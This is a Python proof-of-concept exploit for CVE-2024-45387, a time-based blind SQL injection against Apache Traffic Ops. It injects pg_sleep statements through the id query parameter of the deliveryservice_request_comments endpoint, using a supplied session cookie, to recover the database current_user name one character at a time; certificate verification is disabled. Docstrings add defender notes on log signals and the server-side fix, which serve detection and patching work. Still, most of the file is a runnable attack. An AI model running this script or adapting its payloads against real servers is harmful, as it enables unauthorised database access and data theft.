CVE-2024-45387-PoC.py
#!/usr/bin/python3
import requests
import argparse
import logging
from string import printable
from urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning for the whole process. The request
# helpers in this file call requests.put(..., verify=False), so the server
# certificate is never validated; this line hides the warning, not the risk.
# The session cookie supplied via --cookie is therefore sent to a peer whose
# identity has not been checked.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def parse_args():
    """Parse the command line and return the resulting namespace.

    Options:
        --url     (required) base URL of the Traffic Ops instance under test.
        --cookie  (required) value placed verbatim in the ``Cookie`` request
                  header, i.e. an already-authenticated session.
        --debug   (flag) switch logging from INFO to DEBUG.

    Note: ``--cookie`` is a live session credential passed as a process
    argument, so it is visible in the process list and in shell history on
    the machine where the script runs.
    """
    cli = argparse.ArgumentParser(description="Apache Traffic Ops SQL Injection PoC")
    required_options = (
        ('--url', "Target URL"),
        ('--cookie', "Cookie value for authentication"),
    )
    for flag, help_text in required_options:
        cli.add_argument(flag, required=True, help=help_text)
    cli.add_argument('--debug', action='store_true', help="Enable debug logging")
    return cli.parse_args()
def strip_trailing_slash(url):
    """Return *url* without its final ``/``, if it has one.

    Only a single trailing slash is removed, so the API path appended later
    does not produce ``//``. Any other input is returned unchanged.
    """
    return url[:-1] if url.endswith('/') else url
def setup_logging(debug):
    """Configure the root logger with a timestamped format.

    Args:
        debug: truthy selects DEBUG, otherwise INFO.

    At DEBUG level the request helpers in this file log every injected
    payload together with the observed response time, so the log becomes a
    full record of what was sent to the target.
    """
    logging.basicConfig(
        format='%(asctime)s - %(levelname)s - %(message)s',
        level=logging.INFO if not debug else logging.DEBUG,
    )
def get_length(url, cookie):
    """Infer the length of the database ``current_user`` name from timing.

    For each candidate length 0..14 an authenticated PUT is sent to
    ``/api/5.0/deliveryservice_request_comments``. The ``id`` query parameter
    carries ``1`` followed by a URL-encoded ``;`` (``%3b``) and a second
    statement that calls ``pg_sleep(3)`` only when the guess is right
    (time-based blind SQL injection; the file name ties this to
    CVE-2024-45387). A response whose elapsed time is at least three whole
    seconds is treated as a match.

    Defender notes:
        * The injected SQL sits in the URL query string, so it is visible to
          access logs, reverse proxies and WAFs: PUT requests to this path
          whose ``id`` value is not a bare integer, or contains ``%3b`` /
          ``pg_sleep``, are the signal to alert on.
        * The timing pattern is a run of near-identical requests from one
          session in which a few take about three seconds longer.
        * The durable fix is server-side: treat ``id`` as an integer and bind
          it as a query parameter, and apply the vendor's patched release.

    Args:
        url: base URL without a trailing slash.
        cookie: value sent verbatim as the ``Cookie`` header.

    Returns:
        The first matching length, or ``None`` when no candidate in
        ``range(15)`` produced the delay.
    """
    endpoint = url + '/api/5.0/deliveryservice_request_comments?id=1'
    body = {"deliveryServiceRequestId": 2, "value": "SQLI Test"}
    auth_headers = {"Cookie": cookie}

    for guess in range(15):
        payload = f'%3bSELECT CASE WHEN (length(current_user) = {guess}) THEN pg_sleep(3) ELSE pg_sleep(0) END'
        # verify=False: the server certificate is not validated, so the cookie
        # is sent without any assurance of who is on the other end.
        resp = requests.put(endpoint + payload, verify=False, json=body, headers=auth_headers)
        # elapsed.seconds is the whole-second component of the round-trip time.
        waited = resp.elapsed.seconds
        logging.debug(f"Payload: {payload} - Response Time: {waited} seconds")
        if waited >= 3:
            return guess
    return None
def get_current_user(url, cookie):
    """Recover the database ``current_user`` name one character at a time.

    The length comes from ``get_length``. For every position, each character
    of ``string.printable`` is tried in turn with the same PUT request and
    ``pg_sleep(3)`` timing oracle that ``get_length`` uses; the first
    candidate whose response takes at least three whole seconds is recorded
    and the search moves on to the next position. The assembled name is
    logged at INFO level; nothing is returned.

    Defender notes:
        * This is a high-volume pattern: up to 100 requests per character,
          all to ``/api/5.0/deliveryservice_request_comments`` with SQL text
          in the ``id`` query parameter, from a single authenticated session.
          Rate-based and content-based detections both apply.
        * Statements that call ``pg_sleep`` can also be seen from the
          database side, e.g. in statement logs or slow-query logs where
          those are enabled.
        * Only the account name is read here, but the same injection point
          accepts arbitrary SQL, so the server should be treated as exposed
          until ``id`` is bound as a typed parameter and the vendor fix is
          applied.

    Args:
        url: base URL without a trailing slash.
        cookie: value sent verbatim as the ``Cookie`` header.
    """
    endpoint = url + '/api/5.0/deliveryservice_request_comments?id=1'
    body = {"deliveryServiceRequestId": 2, "value": "SQLI Test"}
    auth_headers = {"Cookie": cookie}

    recovered = ''
    name_length = get_length(url, cookie)
    for position in range(1, name_length + 1):
        for candidate in printable:
            payload = f"%3bSELECT CASE WHEN (substring(current_user FROM {position} FOR 1) = '{candidate}') THEN pg_sleep(3) ELSE pg_sleep(0) END"
            # verify=False: no certificate validation on this connection.
            resp = requests.put(endpoint + payload, verify=False, json=body, headers=auth_headers)
            waited = resp.elapsed.seconds
            logging.debug(f"Payload: {payload} - Response Time: {waited} seconds")
            if waited < 3:
                continue
            recovered += candidate
            logging.info(f"Identified Character for Position {position}: {candidate}")
            break
    logging.info(f"Identified Current User: {recovered}")
def main():
    """Run the proof of concept from the command line.

    Parses the arguments, configures logging, normalises the base URL and
    starts the ``current_user`` extraction against it.
    """
    options = parse_args()
    setup_logging(options.debug)
    base_url = strip_trailing_slash(options.url)
    get_current_user(base_url, options.cookie)


if __name__ == "__main__":
    main()